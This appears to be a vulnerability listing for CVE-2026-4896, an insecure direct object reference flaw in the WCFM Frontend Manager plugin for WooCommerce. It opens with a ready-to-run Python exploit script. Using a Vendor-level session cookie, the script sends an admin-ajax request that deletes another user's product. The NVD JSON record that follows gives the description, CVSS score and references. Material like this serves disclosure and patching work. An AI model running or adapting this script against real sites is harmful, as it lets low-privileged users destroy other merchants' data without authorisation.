CVE-2026-4896

import requests # Target configuration target_url = "https://target-site.com/wp-admin/admin-ajax.php" # Attacker's session cookie (Must be Vendor role or higher) attacker_cookies = { "wordpress_logged_in_xxxxx": "attacker_session_cookie_value" } # Exploit: Delete a product that belongs to another user using IDOR # Change product_id to the target victim's product ID payload_data = { "action": "wcfm_ajax_controller", "wcfm_ajax_action": "delete_wcfm_product", "product_id": "999" # Target Product ID to delete } try: response = requests.post(target_url, data=payload_data, cookies=attacker_cookies) if response.status_code == 200: print("[+] Exploit request sent successfully.") print("[+] Response:", response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] Error occurred:", str(e))

{"cve": {"id": "CVE-2026-4896", "sourceIdentifier": "[email protected]", "published": "2026-04-04T08:16:06.543", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via multiple AJAX actions including `wcfm_modify_order_status`, `delete_wcfm_article`, `delete_wcfm_product`, and the article management controller due to missing validation on user-supplied object IDs. This makes it possible for authenticated attackers, with Vendor-level access and above, to modify the status of any order, delete or modify any post/product/page, regardless of ownership."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-ajax.php?marks=644,880#L644", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-article.php?marks=271#L271", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8248098-dff2-4bac-a138-aa40c7ab7a1c?source=cve", "source": "[email protected]"}]}}